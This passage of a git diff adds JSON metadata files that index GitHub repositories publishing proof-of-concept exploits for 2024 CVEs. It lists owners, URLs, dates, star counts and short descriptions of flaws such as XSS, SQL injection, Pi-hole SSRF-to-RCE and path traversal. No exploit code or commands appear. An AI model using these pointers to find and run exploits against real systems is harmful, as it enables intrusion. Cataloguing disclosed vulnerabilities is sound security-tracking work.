"pushed_at": "2024-05-11T08:57:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34224.json b/2024/CVE-2024-34224.json new file mode 100644 index 0000000000..d2c181c850 --- /dev/null +++ b/2024/CVE-2024-34224.json @@ -0,0 +1,33 @@ +[ + { + "id": 799128235, + "name": "CVE-2024-34224", + "full_name": "dovankha\/CVE-2024-34224", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34224", + "description": "CVE-2024-34224 | Cross Site Scripting", + "fork": false, + "created_at": "2024-05-11T08:58:31Z", + "updated_at": "2024-05-11T10:54:34Z", + "pushed_at": "2024-05-11T10:22:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34225.json b/2024/CVE-2024-34225.json new file mode 100644 index 0000000000..c0a093054a --- /dev/null +++ b/2024/CVE-2024-34225.json @@ -0,0 +1,33 @@ +[ + { + "id": 799155465, + "name": "CVE-2024-34225", + "full_name": "dovankha\/CVE-2024-34225", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34225", + "description": "CVE-20240-34225 | Cross Site Scripting", + "fork": false, + "created_at": "2024-05-11T10:20:52Z", + "updated_at": "2024-05-11T10:54:14Z", + "pushed_at": "2024-05-11T10:25:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34226.json b/2024/CVE-2024-34226.json new file mode 100644 index 0000000000..a3e65c2c18 --- /dev/null +++ b/2024/CVE-2024-34226.json @@ -0,0 +1,33 @@ +[ + { + "id": 799159247, + "name": "CVE-2024-34226", + "full_name": "dovankha\/CVE-2024-34226", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34226", + "description": "CVE-2024-34226 | SQL injection", + "fork": false, + "created_at": "2024-05-11T10:33:04Z", + "updated_at": "2024-05-11T10:53:59Z", + "pushed_at": "2024-05-11T10:42:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34310.json b/2024/CVE-2024-34310.json new file mode 100644 index 0000000000..45ee999d36 --- /dev/null +++ b/2024/CVE-2024-34310.json @@ -0,0 +1,33 @@ +[ + { + "id": 798792445, + "name": "CVE-2024-34310", + "full_name": "3309899621\/CVE-2024-34310", + "owner": { + "login": "3309899621", + "id": 121653948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121653948?v=4", + "html_url": "https:\/\/github.com\/3309899621", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3309899621\/CVE-2024-34310", + "description": "CVE-2024-34310", + "fork": false, + "created_at": "2024-05-10T13:36:19Z", + "updated_at": "2024-05-10T13:39:31Z", + "pushed_at": "2024-05-10T13:39:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34312.json b/2024/CVE-2024-34312.json new file mode 100644 index 0000000000..d428a9794b --- /dev/null +++ b/2024/CVE-2024-34312.json @@ -0,0 +1,36 @@ +[ + { + "id": 818913831, + "name": "CVE-2024-34312", + "full_name": "vincentscode\/CVE-2024-34312", + "owner": { + "login": "vincentscode", + "id": 26576880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4", + "html_url": "https:\/\/github.com\/vincentscode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34312", + "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34312", + "fork": false, + "created_at": "2024-06-23T08:37:44Z", + "updated_at": "2024-06-23T09:28:30Z", + "pushed_at": "2024-06-23T08:59:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34313.json b/2024/CVE-2024-34313.json new file mode 100644 index 0000000000..58884a561a --- /dev/null +++ b/2024/CVE-2024-34313.json @@ -0,0 +1,36 @@ +[ + { + "id": 818920157, + "name": "CVE-2024-34313", + "full_name": "vincentscode\/CVE-2024-34313", + "owner": { + "login": "vincentscode", + "id": 26576880, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4", + "html_url": "https:\/\/github.com\/vincentscode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34313", + "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34313", + "fork": false, + "created_at": "2024-06-23T09:02:07Z", + "updated_at": "2024-07-22T17:39:33Z", + "pushed_at": "2024-07-22T17:39:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "security-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34329.json b/2024/CVE-2024-34329.json new file mode 100644 index 0000000000..68f0df2360 --- /dev/null +++ b/2024/CVE-2024-34329.json @@ -0,0 +1,33 @@ +[ + { + "id": 832282458, + "name": "CVE-2024-34329", + "full_name": "pamoutaf\/CVE-2024-34329", + "owner": { + "login": "pamoutaf", + "id": 78760061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78760061?v=4", + "html_url": "https:\/\/github.com\/pamoutaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pamoutaf\/CVE-2024-34329", + "description": null, + "fork": false, + "created_at": "2024-07-22T17:39:06Z", + "updated_at": "2024-07-22T17:39:24Z", + "pushed_at": "2024-07-22T17:39:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3435.json b/2024/CVE-2024-3435.json new file mode 100644 index 0000000000..076414db91 --- /dev/null +++ b/2024/CVE-2024-3435.json @@ -0,0 +1,33 @@ +[ + { + "id": 803069213, + "name": "cve-2024-3435", + "full_name": "ymuraki-csc\/cve-2024-3435", + "owner": { + "login": "ymuraki-csc", + "id": 119641175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119641175?v=4", + "html_url": "https:\/\/github.com\/ymuraki-csc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ymuraki-csc\/cve-2024-3435", + "description": null, + "fork": false, + "created_at": "2024-05-20T02:17:44Z", + "updated_at": "2024-05-20T02:17:54Z", + "pushed_at": "2024-05-20T02:17:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34350.json b/2024/CVE-2024-34350.json new file mode 100644 index 0000000000..20107ae00f --- /dev/null +++ b/2024/CVE-2024-34350.json @@ -0,0 +1,33 @@ +[ + { + "id": 820951653, + "name": "rewrites-nextjs-CVE-2024-34350", + "full_name": "Sudistark\/rewrites-nextjs-CVE-2024-34350", + "owner": { + "login": "Sudistark", + "id": 31372554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4", + "html_url": "https:\/\/github.com\/Sudistark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sudistark\/rewrites-nextjs-CVE-2024-34350", + "description": null, + "fork": false, + "created_at": "2024-06-27T14:00:34Z", + "updated_at": "2024-06-27T14:00:34Z", + "pushed_at": "2024-06-27T14:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34351.json b/2024/CVE-2024-34351.json new file mode 100644 index 0000000000..308d4bd2f4 --- /dev/null +++ b/2024/CVE-2024-34351.json @@ -0,0 +1,95 @@ +[ + { + "id": 799502114, + "name": "CVE-2024-34351", + "full_name": "Voorivex\/CVE-2024-34351", + "owner": { + "login": "Voorivex", + "id": 16985510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16985510?v=4", + "html_url": "https:\/\/github.com\/Voorivex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voorivex\/CVE-2024-34351", + "description": null, + "fork": false, + "created_at": "2024-05-12T10:49:41Z", + "updated_at": "2024-10-17T08:49:16Z", + "pushed_at": "2024-05-12T13:05:22Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813643412, + "name": "Next.js_exploit_CVE-2024-34351", + "full_name": "avergnaud\/Next.js_exploit_CVE-2024-34351", + "owner": { + "login": "avergnaud", + "id": 14194032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14194032?v=4", + "html_url": "https:\/\/github.com\/avergnaud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avergnaud\/Next.js_exploit_CVE-2024-34351", + "description": null, + "fork": false, + "created_at": "2024-06-11T13:19:18Z", + "updated_at": "2024-11-07T10:40:12Z", + "pushed_at": "2024-07-01T08:21:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848332085, + "name": "nextjs-CVE-2024-34351-_exploit", + "full_name": "God4n\/nextjs-CVE-2024-34351-_exploit", + "owner": { + "login": "God4n", + "id": 67663627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67663627?v=4", + "html_url": "https:\/\/github.com\/God4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/God4n\/nextjs-CVE-2024-34351-_exploit", + "description": "PoC for a full exploitation of NextJS SSRF (CVE-2024-34351)", + "fork": false, + "created_at": "2024-08-27T15:10:26Z", + "updated_at": "2024-10-04T18:20:48Z", + "pushed_at": "2024-08-27T15:21:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34361.json b/2024/CVE-2024-34361.json new file mode 100644 index 0000000000..6e53b87f6c --- /dev/null +++ b/2024/CVE-2024-34361.json @@ -0,0 +1,33 @@ +[ + { + "id": 825467646, + "name": "CVE-2024-34361-PiHole-SSRF-to-RCE", + "full_name": "T0X1Cx\/CVE-2024-34361-PiHole-SSRF-to-RCE", + "owner": { + "login": "T0X1Cx", + "id": 71453093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71453093?v=4", + "html_url": "https:\/\/github.com\/T0X1Cx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T0X1Cx\/CVE-2024-34361-PiHole-SSRF-to-RCE", + "description": "This repository contains an exploit for CVE-2024-34361, a critical Pi-hole vulnerability (CVSS 8.6). It uses SSRF to achieve RCE by exploiting improper URL validation, allowing attackers to send arbitrary requests and execute commands on the system. Disclaimer: For educational and ethical security testing only. Unauthorized use is illegal.", + "fork": false, + "created_at": "2024-07-07T21:22:36Z", + "updated_at": "2024-10-12T15:18:59Z", + "pushed_at": "2024-07-07T21:41:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34452.json b/2024/CVE-2024-34452.json new file mode 100644 index 0000000000..25237537be --- /dev/null +++ b/2024/CVE-2024-34452.json @@ -0,0 +1,33 @@ +[ + { + "id": 817432934, + "name": "CVE-2024-34452", + "full_name": "surajhacx\/CVE-2024-34452", + "owner": { + "login": "surajhacx", + "id": 158517938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158517938?v=4", + "html_url": "https:\/\/github.com\/surajhacx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/surajhacx\/CVE-2024-34452", + "description": "Cross-Site Scripting (XSS) Vulnerability in CMSimple_XH", + "fork": false, + "created_at": "2024-06-19T17:38:49Z", + "updated_at": "2024-09-08T17:07:05Z", + "pushed_at": "2024-06-19T18:17:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34463.json b/2024/CVE-2024-34463.json new file mode 100644 index 0000000000..1a00e8b11d --- /dev/null +++ b/2024/CVE-2024-34463.json @@ -0,0 +1,33 @@ +[ + { + "id": 851102482, + "name": "CVE-2024-34463", + "full_name": "yash-chandna\/CVE-2024-34463", + "owner": { + "login": "yash-chandna", + "id": 46512916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46512916?v=4", + "html_url": "https:\/\/github.com\/yash-chandna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yash-chandna\/CVE-2024-34463", + "description": null, + "fork": false, + "created_at": "2024-09-02T12:33:33Z", + "updated_at": "2024-09-02T19:56:49Z", + "pushed_at": "2024-09-02T19:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34469.json b/2024/CVE-2024-34469.json new file mode 100644 index 0000000000..79d2e7032f --- /dev/null +++ b/2024/CVE-2024-34469.json @@ -0,0 +1,33 @@ +[ + { + "id": 797102726, + "name": "CVE-2024-34469", + "full_name": "Toxich4\/CVE-2024-34469", + "owner": { + "login": "Toxich4", + "id": 47368696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4", + "html_url": "https:\/\/github.com\/Toxich4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toxich4\/CVE-2024-34469", + "description": "CVE-2024-34469", + "fork": false, + "created_at": "2024-05-07T07:47:20Z", + "updated_at": "2024-05-07T14:10:01Z", + "pushed_at": "2024-05-07T09:24:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34470.json b/2024/CVE-2024-34470.json new file mode 100644 index 0000000000..7e3b4a3a8c --- /dev/null +++ b/2024/CVE-2024-34470.json @@ -0,0 +1,157 @@ +[ + { + "id": 796108085, + "name": "CVE-2024-34470", + "full_name": "osvaldotenorio\/CVE-2024-34470", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34470", + "description": null, + "fork": false, + "created_at": "2024-05-05T00:31:31Z", + "updated_at": "2024-07-01T11:39:25Z", + "pushed_at": "2024-05-05T00:52:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817279681, + "name": "CVE-2024-34470", + "full_name": "bigb0x\/CVE-2024-34470", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-34470", + "description": "POC and bulk scanner for CVE-2024-34470", + "fork": false, + "created_at": "2024-06-19T11:32:40Z", + "updated_at": "2024-06-25T11:29:18Z", + "pushed_at": "2024-06-19T21:22:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817593815, + "name": "CVE-2024-34470", + "full_name": "Cappricio-Securities\/CVE-2024-34470", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-34470", + "description": "HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion", + "fork": false, + "created_at": "2024-06-20T04:01:42Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-21T09:48:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 817890438, + "name": "CVE-2024-34470", + "full_name": "Mr-r00t11\/CVE-2024-34470", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-34470", + "description": null, + "fork": false, + "created_at": "2024-06-20T16:47:28Z", + "updated_at": "2024-10-05T16:51:37Z", + "pushed_at": "2024-06-20T18:30:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818833785, + "name": "CVE-2024-34470", + "full_name": "th3gokul\/CVE-2024-34470", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-34470", + "description": "CVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector", + "fork": false, + "created_at": "2024-06-23T02:23:57Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-07-02T11:42:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34471.json b/2024/CVE-2024-34471.json new file mode 100644 index 0000000000..ab729652b8 --- /dev/null +++ b/2024/CVE-2024-34471.json @@ -0,0 +1,33 @@ +[ + { + "id": 796114303, + "name": "CVE-2024-34471", + "full_name": "osvaldotenorio\/CVE-2024-34471", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34471", + "description": null, + "fork": false, + "created_at": "2024-05-05T01:10:39Z", + "updated_at": "2024-05-05T01:20:27Z", + "pushed_at": "2024-05-05T01:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34472.json b/2024/CVE-2024-34472.json new file mode 100644 index 0000000000..826a7c6a2f --- /dev/null +++ b/2024/CVE-2024-34472.json @@ -0,0 +1,33 @@ +[ + { + "id": 796111814, + "name": "CVE-2024-34472", + "full_name": "osvaldotenorio\/CVE-2024-34472", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34472", + "description": null, + "fork": false, + "created_at": "2024-05-05T00:54:56Z", + "updated_at": "2024-05-05T01:09:42Z", + "pushed_at": "2024-05-05T01:09:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34474.json b/2024/CVE-2024-34474.json new file mode 100644 index 0000000000..3d881317fa --- /dev/null +++ b/2024/CVE-2024-34474.json @@ -0,0 +1,33 @@ +[ + { + "id": 796157445, + "name": "CVE-2024-34474", + "full_name": "Alaatk\/CVE-2024-34474", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-34474", + "description": " Clario through 2024-04-11 for Windows Desktop has weak permissions for %PROGRAMDATA%\\Clario and tries to load DLLs from there as SYSTEM.", + "fork": false, + "created_at": "2024-05-05T05:28:15Z", + "updated_at": "2024-07-30T20:02:53Z", + "pushed_at": "2024-05-05T05:37:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34582.json b/2024/CVE-2024-34582.json new file mode 100644 index 0000000000..5c722e58ca --- /dev/null +++ b/2024/CVE-2024-34582.json @@ -0,0 +1,33 @@ +[ + { + "id": 801543237, + "name": "CVE-2024-34582", + "full_name": "silent6trinity\/CVE-2024-34582", + "owner": { + "login": "silent6trinity", + "id": 78173918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4", + "html_url": "https:\/\/github.com\/silent6trinity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silent6trinity\/CVE-2024-34582", + "description": null, + "fork": false, + "created_at": "2024-05-16T12:40:46Z", + "updated_at": "2024-05-16T12:42:44Z", + "pushed_at": "2024-05-16T12:42:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34693.json b/2024/CVE-2024-34693.json new file mode 100644 index 0000000000..f8ed2f4288 --- /dev/null +++ b/2024/CVE-2024-34693.json @@ -0,0 +1,70 @@ +[ + { + "id": 834629281, + "name": "CVE-2024-34693", + "full_name": "mbadanoiu\/CVE-2024-34693", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-34693", + "description": "CVE-2024-34693: Server Arbitrary File Read in Apache Superset", + "fork": false, + "created_at": "2024-07-27T21:28:11Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-07-27T21:58:04Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-read", + "cve", + "cve-2024-34693", + "cves" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835883162, + "name": "CVE-2024-34693", + "full_name": "Mr-r00t11\/CVE-2024-34693", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-34693", + "description": null, + "fork": false, + "created_at": "2024-07-30T18:02:25Z", + "updated_at": "2024-07-30T18:07:54Z", + "pushed_at": "2024-07-30T18:07:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34716.json b/2024/CVE-2024-34716.json new file mode 100644 index 0000000000..ac154fc3a0 --- /dev/null +++ b/2024/CVE-2024-34716.json @@ -0,0 +1,64 @@ +[ + { + "id": 800659974, + "name": "CVE-2024-34716", + "full_name": "aelmokhtar\/CVE-2024-34716", + "owner": { + "login": "aelmokhtar", + "id": 66908023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66908023?v=4", + "html_url": "https:\/\/github.com\/aelmokhtar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aelmokhtar\/CVE-2024-34716", + "description": null, + "fork": false, + "created_at": "2024-05-14T18:48:41Z", + "updated_at": "2024-10-19T08:32:52Z", + "pushed_at": "2024-09-27T10:46:14Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 879884108, + "name": "Prestashop-CVE-2024-34716", + "full_name": "0xDTC\/Prestashop-CVE-2024-34716", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Prestashop-CVE-2024-34716", + "description": null, + "fork": false, + "created_at": "2024-10-28T18:03:30Z", + "updated_at": "2024-11-07T06:17:14Z", + "pushed_at": "2024-11-07T06:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + 